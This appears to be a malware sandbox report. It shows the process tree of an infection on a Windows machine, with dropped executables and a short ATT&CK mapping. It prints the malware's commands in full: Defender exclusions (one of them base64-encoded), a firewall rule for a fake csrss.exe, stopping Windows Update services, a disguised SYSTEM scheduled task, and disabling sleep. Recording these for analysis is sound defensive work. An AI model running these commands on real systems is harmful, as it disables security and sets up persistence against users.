C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4104 /prefetch:1
8⤵
PID:7608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:1
8⤵
PID:7832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1
8⤵
PID:6188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1
8⤵
PID:7956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
8⤵
PID:8096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
8⤵
PID:8036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
8⤵
PID:6952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
8⤵
PID:7820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
8⤵
PID:6204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
8⤵
PID:7964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:1
8⤵
PID:7844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
8⤵
PID:8616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:1
8⤵
PID:8872

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6664 /prefetch:1
8⤵
PID:8864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:1
8⤵
PID:9180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7740 /prefetch:1
8⤵
PID:9188

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9896 /prefetch:8
8⤵
PID:5040

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9896 /prefetch:8
8⤵
PID:7100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8396 /prefetch:1
8⤵
PID:5916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9248 /prefetch:1
8⤵
PID:5948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4072 /prefetch:8
8⤵
PID:4396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
7⤵
- Suspicious use of WriteProcessMemory
PID:2152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7fff19a546f8,0x7fff19a54708,0x7fff19a54718
8⤵
PID:2396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,17508262022098332686,6743768273612453791,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
8⤵
PID:816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,17508262022098332686,6743768273612453791,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
8⤵
PID:1752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
7⤵
- Suspicious use of WriteProcessMemory
PID:3124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7fff19a546f8,0x7fff19a54708,0x7fff19a54718
8⤵
PID:4836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,12483192448181291342,1652120273329272981,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
8⤵
PID:1032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,12483192448181291342,1652120273329272981,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
8⤵
PID:5976

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2ne4059.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2ne4059.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4292

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:5020

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:4604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 540
8⤵
- Program crash
PID:5452

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2664

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8iC574jv.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8iC574jv.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5936

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
PID:6032

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9Ei0mD5.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9Ei0mD5.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6112

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:3256

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:4428

C:\Users\Admin\AppData\Local\Temp\8335.exe
C:\Users\Admin\AppData\Local\Temp\8335.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:9020

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
3⤵
- Executes dropped EXE
PID:6968

C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2836

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:400

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6416

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
3⤵
- Executes dropped EXE
PID:5420

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:3280

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
4⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- Modifies data under HKEY_USERS
PID:5112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5972

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:3964

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:1412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Modifies data under HKEY_USERS
PID:7028

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:8980

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
5⤵
PID:4596

C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:3404

C:\Users\Admin\AppData\Local\Temp\A10E.exe
C:\Users\Admin\AppData\Local\Temp\A10E.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4600

C:\Users\Admin\AppData\Local\Temp\A70B.exe
C:\Users\Admin\AppData\Local\Temp\A70B.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7772 -s 752
3⤵
- Program crash
PID:7212

C:\Users\Admin\AppData\Local\Temp\BD53.exe
C:\Users\Admin\AppData\Local\Temp\BD53.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 784
3⤵
- Program crash
PID:7204

C:\Users\Admin\AppData\Local\Temp\1893.exe
C:\Users\Admin\AppData\Local\Temp\1893.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5384

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
3⤵
PID:3416

C:\Users\Admin\AppData\Local\Temp\5494.exe
C:\Users\Admin\AppData\Local\Temp\5494.exe
2⤵
- Executes dropped EXE
PID:5892

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
3⤵
PID:9156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
4⤵
PID:6768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd8,0xdc,0xe0,0xd4,0x104,0x7fff19a546f8,0x7fff19a54708,0x7fff19a54718
5⤵
PID:6764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,11709107597077984248,14769832527556313697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
5⤵
PID:2980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,11709107597077984248,14769832527556313697,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:2
5⤵
PID:3504

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,11709107597077984248,14769832527556313697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2612 /prefetch:8
5⤵
PID:1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11709107597077984248,14769832527556313697,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
5⤵
PID:7612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11709107597077984248,14769832527556313697,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
5⤵
PID:5252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11709107597077984248,14769832527556313697,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4120 /prefetch:1
5⤵
PID:1704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11709107597077984248,14769832527556313697,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:1
5⤵
PID:8856

C:\Users\Admin\AppData\Local\Temp\5754.exe
C:\Users\Admin\AppData\Local\Temp\5754.exe
2⤵
- Executes dropped EXE
PID:848

C:\Users\Admin\AppData\Local\Temp\58AC.exe
C:\Users\Admin\AppData\Local\Temp\58AC.exe
2⤵
- Executes dropped EXE
PID:7900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:4084

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
2⤵
PID:2816

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:8556

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:8960

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2572

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:8984

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:8976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
2⤵
PID:8044

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:4220

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:8456

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:8304

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:7408

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:5820

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
2⤵
PID:7108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4604 -ip 4604
1⤵
PID:4088

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7048

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 7772 -ip 7772
1⤵
PID:6740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4552 -ip 4552
1⤵
PID:6752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
1⤵
PID:4928

C:\Users\Admin\AppData\Roaming\Items\Current.exe
C:\Users\Admin\AppData\Roaming\Items\Current.exe
1⤵
PID:6528

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
2⤵
PID:3204

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:4452

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5724

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:228

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

